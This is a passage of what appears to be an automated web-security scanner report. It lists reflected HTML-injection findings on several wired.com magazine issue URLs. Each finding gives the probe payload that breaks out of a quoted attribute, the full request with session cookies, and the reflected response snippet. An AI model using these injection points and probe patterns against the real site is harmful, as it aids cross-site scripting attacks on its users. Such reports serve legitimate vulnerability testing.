Path:   /wired/issue/16-04/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4f74"><a>652de2d69ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/16-04b4f74"><a>652de2d69ff/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=237
Expires: Mon, 22 Nov 2010 01:09:51 GMT
Date: Mon, 22 Nov 2010 01:05:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_16-04b4f74"><a>652de2d69ff">
...[SNIP]...

1.1349. http://www.wired.com/wired/issue/16-05/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-05/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8725"><a>8420d93529b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issuec8725"><a>8420d93529b/16-05/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:09:03 GMT
Date: Mon, 22 Nov 2010 01:05:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issuec8725"><a>8420d93529b c_16-05">
...[SNIP]...

1.1350. http://www.wired.com/wired/issue/16-05/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-05/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7284"><a>f4e7c102648 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/16-05d7284"><a>f4e7c102648/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:09:56 GMT
Date: Mon, 22 Nov 2010 01:05:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_16-05d7284"><a>f4e7c102648">
...[SNIP]...

1.1351. http://www.wired.com/wired/issue/16-06 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-06

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f50eb"><a>0f522718632 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issuef50eb"><a>0f522718632/16-06 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=230
Expires: Mon, 22 Nov 2010 01:08:35 GMT
Date: Mon, 22 Nov 2010 01:04:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issuef50eb"><a>0f522718632 c_16-06">
...[SNIP]...

1.1352. http://www.wired.com/wired/issue/16-06 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-06

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91af4"><a>0d0253827d5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/16-0691af4"><a>0d0253827d5 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:09:45 GMT
Date: Mon, 22 Nov 2010 01:05:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_16-0691af4"><a>0d0253827d5">
...[SNIP]...

1.1353. http://www.wired.com/wired/issue/16-07 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-07

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dd8a"><a>96480a8cd6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue9dd8a"><a>96480a8cd6d/16-07 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=220
Expires: Mon, 22 Nov 2010 01:08:24 GMT
Date: Mon, 22 Nov 2010 01:04:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue9dd8a"><a>96480a8cd6d c_16-07">
...[SNIP]...

1.1354. http://www.wired.com/wired/issue/16-07 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-07

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1f17"><a>1afdb79e6a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/16-07e1f17"><a>1afdb79e6a5 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:09:33 GMT
Date: Mon, 22 Nov 2010 01:05:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_16-07e1f17"><a>1afdb79e6a5">
...[SNIP]...

1.1355. http://www.wired.com/wired/issue/16-08 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-08

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff591"><a>46f679cbbb3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issueff591"><a>46f679cbbb3/16-08 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=219
Expires: Mon, 22 Nov 2010 01:08:07 GMT
Date: Mon, 22 Nov 2010 01:04:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issueff591"><a>46f679cbbb3 c_16-08">
...[SNIP]...

1.1356. http://www.wired.com/wired/issue/16-08 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-08

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6d50"><a>2ace45fa09d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/16-08e6d50"><a>2ace45fa09d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:09:28 GMT
Date: Mon, 22 Nov 2010 01:05:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_16-08e6d50"><a>2ace45fa09d">
...[SNIP]...

1.1357. http://www.wired.com/wired/issue/16-09 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-09

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c954"><a>36a920c6495 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue8c954"><a>36a920c6495/16-09 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=219
Expires: Mon, 22 Nov 2010 01:06:17 GMT
Date: Mon, 22 Nov 2010 01:02:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue8c954"><a>36a920c6495 c_16-09">
...[SNIP]...

1.1358. http://www.wired.com/wired/issue/16-09 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-09

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43bb9"><a>b0f9cc9a179 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/16-0943bb9"><a>b0f9cc9a179 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=226
Expires: Mon, 22 Nov 2010 01:07:15 GMT
Date: Mon, 22 Nov 2010 01:03:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_16-0943bb9"><a>b0f9cc9a179">
...[SNIP]...

1.1359. http://www.wired.com/wired/issue/16-10 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-10

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c841a"><a>4d579212ed5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issuec841a"><a>4d579212ed5/16-10 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=238
Expires: Mon, 22 Nov 2010 01:06:35 GMT
Date: Mon, 22 Nov 2010 01:02:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issuec841a"><a>4d579212ed5 c_16-10">
...[SNIP]...

1.1360. http://www.wired.com/wired/issue/16-10 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-10

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d02f"><a>4a9c57581a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/16-103d02f"><a>4a9c57581a HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29350
Vary: Accept-Encoding
Cache-Control: max-age=226
Expires: Mon, 22 Nov 2010 01:07:10 GMT
Date: Mon, 22 Nov 2010 01:03:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_16-103d02f"><a>4a9c57581a">
...[SNIP]...

1.1361. http://www.wired.com/wired/issue/16-11 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-11

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56a69"><a>5ad80dfb3b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue56a69"><a>5ad80dfb3b7/16-11 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:06:32 GMT
Date: Mon, 22 Nov 2010 01:02:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue56a69"><a>5ad80dfb3b7 c_16-11">
...[SNIP]...

1.1362. http://www.wired.com/wired/issue/16-11 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-11

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8228f"><a>340cdb6273d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/16-118228f"><a>340cdb6273d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=217
Expires: Mon, 22 Nov 2010 01:06:53 GMT
Date: Mon, 22 Nov 2010 01:03:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_16-118228f"><a>340cdb6273d">
...[SNIP]...

1.1363. http://www.wired.com/wired/issue/16-12 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-12

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70903"><a>c8dc6145ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue70903"><a>c8dc6145ff/16-12 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29350
Vary: Accept-Encoding
Cache-Control: max-age=235
Expires: Mon, 22 Nov 2010 01:06:03 GMT
Date: Mon, 22 Nov 2010 01:02:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue70903"><a>c8dc6145ff c_16-12">
...[SNIP]...

1.1364. http://www.wired.com/wired/issue/16-12 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-12

Issue detail

